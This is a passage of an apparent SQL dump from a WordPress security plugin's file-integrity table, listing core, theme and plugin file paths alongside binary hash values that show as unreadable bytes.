7OfP��','',0,'?'),('�z#z�rWĻo������','wp-content/themes/regina-lite/sections/section-page-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�DΒ6��R�lԬ/��','(��p�����u���Za���f�__�n','',0,'?'),('�����[���D?_�[�','wp-includes/random_compat/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4������Տ��d�','�I�n��6��_����ga8��y��].��','',0,'?'),('���7�M3�$��','wp-includes/images/smilies/icon_question.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[-\0�\'��W��F','�7b��|6#����9/?x��~��[��%t','',0,'?'),('����2@�k�w>K�2','wp-includes/feed-atom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{\r�g�\'SkI�fe�p�','!�I��m\nY��f+̕�P\0����13�\\=��','',0,'?'),('����H\0ۙ��h�C��','wp-admin/css/colors/ectoplasm/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�D���9�j�K\\','~�2��H�3��.�4�\"���Fo�W��^܉','',0,'?'),('��\n�4jy��;7ZJ�','wp-content/themes/advance/content-single.php',0,'�(��S�bY��w�&�','�(��S�bY��w�&�','���>�\n|Zg �����^H�oZ?nG��IK','',0,'?'),('��wt�H���-s�\0�n','wp-includes/js/wplink.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7\"U��\"�?���','S\\�� ���ٺ�\'?��I��75�{','',0,'?'),('���ݼ*�$3��G ','wp-content/themes/doctors/core/contents/loop_frontPage/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`!]r��(�ٝ��H)','�Y�*�^\0�iJhv���10�S�J\n�\0Z�A�E','',0,'?'),('���=֬H�@-i��','wp-includes/css/admin-bar-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����r���ju',',t�c* 2�����3ئI����4�j','',0,'?'),('�֔��ߚy(qD�w�','wp-content/plugins/wordfence/models/common/wfGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�YJs@j���r�jtm','�3ÑѲs��\r&�z=���ds��pJx�3�w','',0,'?'),('�ذ�!��7�Wx����','wp-content/themes/regina-lite/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U�p?0��F��','�7O��v|L���1\ZM���~�xn�_�','',0,'?'),('��h�L���JH�X#0','wp-content/plugins/wordfence/lib/wfUnlockMsg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�c)��Re�Y�l�7��','.�`�i�W� t1�}�sty�ɪ���!K','',0,'?'),('��x���ƌ���F���','wp-content/themes/healthcare/images/portfolio/4.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��f�u�42D{\"��','r�P�^�pY�,\ny�go�ա�S��|=��*��','',0,'?'),('����Kǥݳ�|u��','wp-content/themes/twentytwentyone/inc/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�:/=�P�|Ds�)�','v|�^�ц��E�O�x���̠R��ƌ$��G','',0,'?'),('��h�_��-�\rus{t�','wp-content/plugins/wp-cerber/assets/flags/bd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_R�jQ�k.��4','k�j8�F��/���)�5��aC�,�12O�H\'','',0,'?'),('���^��\'�q���0��','wp-links-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ln��j�\\w�X=7I','7���\"1j��L?9Y�\"��&���kŌVD�|��','',0,'?'),('��u���CC���','wp-content/themes/doctors/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m��z�\r�D�ش','rKn_4_��+���/Q�����*Tw��ع�\nߚ','',0,'?'),('��z3�d�K.��u+z','wp-content/themes/healing-touch/images/slides/slider3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�1&6�Dw�cJ��O)','`���Q�[5�1\r�\"���Ĭ.E�d�����','',0,'?'),('�%n��Tߒ ^�gXΰ','wp-admin/js/inline-edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ub��:\\22B�E�C��','C��{�/I~��\Z\"\"e�UT��B���ވg','',0,'?'),('�3��aD�w�P����q','wp-admin/includes/class-theme-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڪ&��텾��U�7y','��-R��RlG���cR�K��������a:���*>','',0,'?'),('�G���M�.��','wp-content/themes/twentynineteen/sass/variables-site/_fonts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xY� i��F욤yG�','Z{���L��� �GNJ��\n� ����⪋��','',0,'?'),('�L(,�.����ZP/:�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z9գ��#����@�r��','K��uBi!�K�V�\0zW���=U�B 2�','',0,'?'),('��n&���n�!崬�','wp-admin/css/site-icon.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�ˁx�J��TG���','�+���W���V��3�(qF���r;�|^�@��','',0,'?'),('����EX���|T��','wp-includes/blocks/media-text/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�0�y���~_>2�','ɗU�(���S�t��R��QYq�ex}I\'��P','',0,'?'),('��Vr^T2���X�O���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�B� �?�{n��\Z','t�����p1��\ZQU�|O���\Z(0�\"tV[','',0,'?'),('��]j�l�\'��/x5','wp-includes/js/wp-sanitize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:k���E�t6Q��','yΦV�� }ɛq����K>ۈP6��*��C\ns}','',0,'?'),('���W��{�\\,�Yu�','wp-includes/js/jquery/ui/effect-explode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���i!1�� �','s��e=\'���ڜ�N�I�{�U�!�M�E�s','',0,'?'),('��71���}\n��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�2+;�F���нNM��','�w��\"�*��5�U T@��nyȳ�^a�u��\'','',0,'?'),('��^�\"�uyQS�','wp-content/themes/wp-barrister/library/js/imagesloaded.pkgd.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ٙ$�ҿ��¨��','0@$��DvNln%?~`�\nK�����\0�','',0,'?'),('�,�{�vF��ߝ��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z9գ��#����@�r��','K��uBi!�K�V�\0zW���=U�B 2�','',0,'?'),('�2X69G3�\Z�+}A�6','wp-content/plugins/wordfence/views/waf/option-whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@7���#{X��q��','J���n�������Pq��/�\Z�n\n��l�V','',0,'?'),('�5����\r��k��','wp-admin/js/color-picker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����zhg\0~���','=k�jY�8�8r�a���hI�:Rի9��i��É','',0,'?'),('�8�������P5aĨ� ','wp-includes/images/smilies/icon_wink.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e?2���i����','�(���V��{�V�Bk����o(`Z��V 6','',0,'?'),('�����y85���æb�','wp-admin/css/colors/sunrise/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z��t��b傽�','�]�\0�mXٕ���Ç?���L�d�rHyʧ','',0,'?'),('��l�3. XN�','wp-includes/Requests/Exception/HTTP/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`�\r�o��k3��1�','�I�l�E�K�Ѧ��?Z�0JT�����U�','',0,'?'),('��>��t�ːXA\\�','wp-content/themes/vision-lite/images/mobile_nav_right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I����Y#��&٩O','/E��tX`6�G�>�EPx>�k�[�E���','',0,'?'),('��{�1u�.b}κ0$�','wp-content/plugins/wp-cerber/assets/flags/bi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',|��\\_��27�k�� ','v����JȢ�\"DWK�9q �Q�^F%a�A','',0,'?'),('����PQ�E|E}7+','wp-admin/includes/class-wp-filesystem-ftpsockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�/CO\Z>yCiϼ�2�','�9�{��pZ�I�͖��w[Y��.2�l�7��','',0,'?'),('��U���$�\\*�1^�S�','wp-includes/js/jquery/ui/effect-clip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��=�����:� s','��tw�:��o,�u3Mxm���x�H ��gC��','',0,'?'),('��נ�3J�[%Dc�','wp-content/themes/healthcare/bootstrap/js/bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�٠l�<Q�J�8m�e�','���Q�(mk<T\n�^�t����K��PҸ�f�','',0,'?'),('����P�J�t��1z','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��wU ��ې6M�\\�8','<����\0�\rIB=\"�P8D�\"�����L~�I[','',0,'?'),('����_�� �\0*�O','wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��u��tu�+]�a','�\n�1�IJ��A��P3����C\0{K7QO��f�','',0,'?'),('��\'ss��Ѵ s��t�','wp-content/themes/doctors/core/contents/loop_author/skin1/c-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W\"Z�\'}I^�r�t��','B�����7���ૃ��5G�2�Z,D�=p:','',0,'?'),('��P\Z��/���l%�','wp-includes/js/jquery/jquery.hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��hI�QLZA$Un�H�','��T����f�RMS�9º��MDR��R��N�','',0,'?'),('�\0� ��k~��U5T','wp-includes/widgets/class-wp-widget-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;���\r9!�5�P�','Y����7%��Z�Gݠ\Z��ӊr�cI�ϸ','',0,'?'),('��Ϟ���b�I','wp-content/themes/doctors/core/home/blocks/info_box/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C��n!����V �','��(�T(�R������F���+�!����','',0,'?'),('� J.�\'��Vn{�|�T�','wp-content/plugins/wp-cerber/assets/bgwidget.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PM6ev����3���','��F.�F��3��r5�e�*\rl��������3\r','',0,'?'),('�\n%f[!aE�r�tg�i','wp-includes/images/media/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����u�h����q��','DBU����MiO�b�,���e��=��W�{���','',0,'?'),('�&�S짿o�$�0�n','wp-includes/author-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','©ei+`љ�[��>q','kt0���6�;��^@�ê��R Β�6�9r߯','',0,'?'),('�\'P��T]� �6�~�','wp-content/plugins/akismet/_inc/img/logo-full-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^K��-^��>A�s{�','�%>��:1��W��R����ͩ��Q�i��~�^G','',0,'?'),('�1v!�������','wp-content/themes/weblog/acmethemes/hooks/navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y�e��f���J&�[','���j��*y�~~]p鯀1d/������','',0,'?'),('�G�|$p֠+(�','wp-admin/js/tags-box.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9W�`��(P�E쐷','�������}�;R)_�J7���*��?���[','',0,'?'),('�H��ɪ\Z4��ͻ','wp-content/plugins/wp-cerber/assets/flags/cl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�Q�a�A�ߜ����',' I���ײ|01aK�ը�r%բ�(ظlR�','',0,'?'),('�Q����ԁ�2�7u�L','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1���3y����1��',' }��N� <�v���B�S%�s\\���S�','',0,'?'),('�Q�*\\\nI�I��|� �','wp-content/themes/regina-lite/inc/components/entry-meta/class-mtl-entry-meta-output.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d� �\ng�r�zn���_','ZUp���|����̪�bU��_D�_�o�ˆ%_�','',0,'?'),('�R��B�p��m�Z�;','wp-includes/css/dist/block-editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','݁mz���O���ya*p','��&aX�\n��q�E�D������$3Gt���','',0,'?'),('�y�Hz��\"�\\����','wp-content/plugins/wp-cerber/assets/flags/tl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�/`�3˸:��Ldlj','q\0HP��+���m �l�K��(��H�','',0,'?'),('�o�j����y��V','wp-content/plugins/wordfence/lib/menu_tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gԌ�p�P�Ig[=��','�V���!�ޟ��ƚ_z�=�|�yaX�ȏ�','',0,'?'),('��Ca�s�]��n�/��','wp-includes/css/dist/block-library/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a�,U���ʑ�','��܉�)�\0I]�7h�S��l�(�B\n}kw�a','',0,'?'),('��Ѻ�\"�P5��^U�\Zi','wp-admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J� Ki\Zb+GZ��B','\r9�cgfĊ�T�v��S(�9IE�$�pH��','',0,'?'),('����;M={��p���','wp-content/themes/vision-lite/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','` CÊ�A@����`�','�\'�\\�o4���o�|4I,@ J�O����Ћ�','',0,'?'),('���8h�YX�O./0�I2','wp-content/themes/advance/functions.php',0,'�=e�\'<�<�����K5','�=e�\'<�<�����K5','�#!O���q�$���&�x�ʸ�k3��','',0,'?'),('��m���z4�L��K','wp-admin/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� 3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('����A�G,��<���','wp-includes/js/jquery/ui/effect-fade.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*Bz��L��','�j�fD�G��=c�Fs㏽���~�쉹X','',0,'?'),('����:��C��E<','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-upload.php',0,'Әȵ �_8�Q3��','Әȵ �_8�Q3��','�u3{#\'r=MY,��k��ڎ\0��R�tY��','',0,'?'),('����8#i�j�g�m,�','wp-content/plugins/redirection/locale/redirection-en_CA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ԩĖ»��K=ؠ�','���5�~��#���-jP�i6k~�M*۾Qh�','',0,'?'),('����n\0D,����;R','wp-content/plugins/wordfence/js/jquery.dataTables.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\\�� �͕�h�','v�Ao;�uD�3$�WB95�_\"��� �','',0,'?'),('��l�a�V�G[1','wp-content/themes/regina-lite/page-templates/blog-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߇��O��6��o�T','�R��r�uKB��<���3� Š�\0���8j','',0,'?'),('�����հ ̋�Ȳ�S','wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�Ƚ� ����\\E','��\\� ����O��JpF�>Q�� �?��lgi���.','',0,'?'),('� �n�$��q��^qf��','wp-includes/images/smilies/icon_lol.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����:ѷ&����(�','�l�1�Hq�.�2�x��$�Y�\Z8�','',0,'?'),('�\'^�D��IG�1��!','wp-includes/ms-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ظ;�#�t��r�/+0','J�c�CBE�䱢?$Gq�u,7��ޚ�A�','',0,'?'),('�*T�u\r�����~�m','wp-admin/css/colors/ocean/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v0O��,�ᤴX��','찐p\\B�lI����`�{i�~����&QO','',0,'?'),('�1l<� t~L�Uw�','wp-includes/class-wp-locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�P�<�#��\0�\':','�D��n]����AW�EH�O�H�@�hAD}','',0,'?'),('�E-j��1j��\r�E�','wp-includes/registration-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q<۾\Z7�M�v��','Kd���_�MF� X��X�.,\'T\\��6���6','',0,'?'),('�R��Hp\Z�o�#��','wp-content/themes/regina-lite/inc/customizer/custom-controls/class-regina-section-upsell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hV�Te�2U�^\\��U','�6[��;nK�K��Oꠋ��xLE�W ��i ]','',0,'?'),('�]oM�se��J4�','wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o���h5��\rxܖN','6y\Zu�υ;� �0�~�rs1J�9��X���J���','',0,'?'),('�f ��r�p�(��p�$�','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),('�g�K�;�qF�VI}�Q�','wp-includes/Requests/Exception/HTTP/416.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�N9�ɪ�a�Dx�','�(��mybV�aI�jWp���(!A����<(�X','',0,'?'),('�he��M]�BӱS�˜�','wp-content/plugins/redirection/models/fixer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TL�:.\"?�1VZ�9','��U9�������`�Z,_��(q���\0�;V9ً','',0,'?'),('�ir�u�5������','wp-content/themes/twentytwenty/assets/js/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,`��Ќe�dÉd','���*o��z@\n��g�cR��9%�GY�`(J0','',0,'?'),('�������<�x�B�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���xqE̜$�b0^�s','T\0>�t�d��ը&\Z4qɢ���A :�C�C��Q','',0,'?'),('��I�WR#�N6���Y','wp-content/themes/doctors/core/contents/part_subHeader/subHeader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\nOG �a뱺n�','�݀SS#���#X�/�Ͱ脘��f��,��\Z','',0,'?'),('��e�-��Rȉ���L:�','wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�Z��O�;�m�#�','�v�̀��O��=��n��u�#�}��զ`�4�W�','',0,'?'),('���8���ՠ�)j,z','wp-content/themes/twentynineteen/sass/site/primary/_posts-and-pages.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HB-���L\'�g�Aq','vɘ(�f]A��?p�AR\Za��Ɓ& A9\r[��2','',0,'?'),('��p?E^�@�\'��PE�','wp-admin/edit-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��L�(�`��#��','W~T+��$��zgbl�ء\'���p3��m�1','',0,'?'),('��>i�>C�.�|#�q','wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4�k�q¸�f&','<S�H>�x�Ɂ����9�|f2�Qν���mF','',0,'?'),('������U�\\��a�E','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��ͱ��r0��=�','?E�%��+�����w�\r�^�֗.$�i�$[W','',0,'?'),('���i��֯1�o�R!','wp-content/plugins/wp-cerber/assets/flags/fm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=KbF�!X�ټh[�(@','/�������_S��L��`ZI�I(1���','',0,'?'),('�B����!��vݡɶ','wp-content/plugins/wordfence/views/onboarding/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zz�#uv��\0���','��}���|IR�v�J�%-�/\n�V���','',0,'?'),('�+�i�p�ZӶtB','wp-content/themes/twentytwentyone/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��rA�_�ù�_9','�ޔ�<N�6����o8���\r�����$i','',0,'?'),('�<��(��*A]�O�','wp-admin/css/colors/ocean/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','35\"�e4��9��,<?','n)(�Q�hA`�[��汶<�J��t({��dـ','',0,'?'),('�D��d.P˴{-yo�g','wp-content/plugins/wordfence/views/common/status-warning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�f�uֺg-g\0C�=v','�N<\r�;��d�*��8+)�\ZbO?�0��E���','',0,'?'),('�I|�K9�(�{s�X','wp-content/plugins/wordfence/lib/menu_scanner_credentials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}����\0���\Z�̿�','|�?b~����ڬ��(�ʹ;l�G9��','',0,'?'),('�N\"�,�_� 3���B�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-misc-options-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�B���4�H','i�썚<X�\'hw�4E�u�*\\���xQ��7�','',0,'?'),('�a�ͮ�(�o��:`','wp-content/plugins/wp-cerber/assets/flags/dm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�<�-�.��w','��h*W̕|l�0jhWp:���z��[V,','',0,'?'),('�bv��E��H���΄','wp-includes/js/wp-lists.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M4���KYs:��ȫ�','����Z-3w�Eї\rqK]��3�]��.X','',0,'?'),('�hS����:���`','wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�+C#+|�fZ���]�','kn\Zy�&��_��[��Igl�(�g\'�^�G','',0,'?'),('�sU\\���C��#w+','wp-content/themes/healthcare/template-leftbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|a��nM�$��[S�','��\"�p��W��a�Q���<������Y�ۜ�','',0,'?'),('�a�J�,�Hb��lQ>','wp-content/themes/weblog/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\��������','-Rx�v�W��$z�3�9F`�G#�wr-V,���F','',0,'?'),('��!T�U/�le�','wp-content/themes/regina-lite/sections/section-breadcrumb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b�����j]&4;','&=aSC~LGp��G� �����Z�\\kY��G9','',0,'?'),('���&��N�,���6P','wp-admin/images/icons32-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*04�G4F� &Z�i}\"','�.a�}��hw�6�WEʭ�(3�Jӭ�9�E�','',0,'?'),('�д��\0N莦v�\n=t','wp-content/plugins/wp-cerber/assets/flags/cz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cR��}S������J�','�m*1\"�vl�ř:\\��f����?.�؟i��\0�','',0,'?'),('�ٯx�������n�b�','wp-content/themes/wp-barrister/content-aside.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڷ�sV\".���@(��','�Y���EX_�m�y�d��ٛs�d���W_�','',0,'?'),('��v��#q���ȃ�','wp-includes/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EOxٕX�2떭','x��aJN�!e���\"\"Nq�}�AMC�1)��{�j','',0,'?'),('��W31��N���gפ��','wp-includes/js/dist/vendor/react.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jB���e�}����\"\Z','�g��+_u<!�\'��[��N�b�r��c�>;','',0,'?'),('����AC��L\\,>��','wp-content/themes/healthcare/css/admin-rating.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1X��-�$O��YG','r���OFX�*tQ�_d}Dd\Z~c�2','',0,'?'),('��x[�e��>M�','wp-admin/includes/edit-tag-messages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m-I�f3�f\\Z��','u�-h�yjL��!z�V���-1�nyFY�Ý�&�','',0,'?'),('�������1�!��N','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('���#x�պ����$�','wp-content/themes/healing-touch/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K(��GV@��dfj.','�ۈK��P�,Q�SE;\Z$��q�I1����','',0,'?'),('�\Z��ae��q&k8:*','wp-content/themes/doctors/core/home/blocks/slideshow/skin1/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�h����H�N#�$�','�2�<\n�#�^I��]r�g}|\'�t�co����','',0,'?'),('�.@m��������5G','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/minicolors/jquery.minicolors.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cs���s�j�g�4:','� `���~w0�\r,P (���wPj��L->�3','',0,'?'),('�q�h���Bc�92��','wp-admin/network/site-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bh@�Uj՟���G��\'{','9;#���l+��9���\"��p�LŢ�ۈ�|','',0,'?'),('����;��=7>5H�� ','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/toggle.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�`�P�rQ�W��vF','>����B��bV�0�������cl�2C���','',0,'?'),('���\\F�Z�7i�','wp-content/themes/twentynineteen/sass/site/primary/_comments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�\0\0�P�qSqUь�','�n�BEqO�Ȉ����}]��� ��ULryi��','',0,'?'),('���I:�.�X�<��!�','wp-content/themes/twentytwenty/assets/images/2020-square-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��4(��|���&�','�`�z�z�Y`]���3��)�]:a>�?oez��','',0,'?'),('��n1.Óu�t���lX','wp-admin/css/colors/modern/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+@}�����nf\Z��E','Xi� t���j<u&����%C�\rA��\0�6!�','',0,'?'),('��^��a|��xz;�9�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/repeater.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��#ĉA�H�$�','Ja���qj��ʗ�$���˥�_d��','',0,'?'),('����`%��{��+��','wp-content/plugins/wordfence/images/icons/error128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�%7�!��.�','{h\0,�]�z�k�V�{җ�6nG\n�x��s9�','',0,'?'),('���v��\\Q���-��','wp-includes/js/tinymce/plugins/hr/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' %>�)���;��','F��S�[k���&�f� 6+�b�>��','',0,'?'),('��t��h� ,Gx�\"M','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��R�N\Zb8M�g�|','{�����R�tH}��ܧYQ��{�F\Z�H�','',0,'?'),('�ƚ�ŏH�Wn�\'i�','wp-content/plugins/wp-cerber/assets/goo-translate.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�c�\"C�!㋫x�o','�>��Cv^��/�V����r��cCƨK(��P��','',0,'?'),('����\n]��Y�&��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/image.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�#�.Gbi���P$','1��w�y��!�Y��y�a�o��8�ƻ','',0,'?'),('���9�X����U�7�z','wp-content/plugins/wordfence/models/page/wfPage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�bo 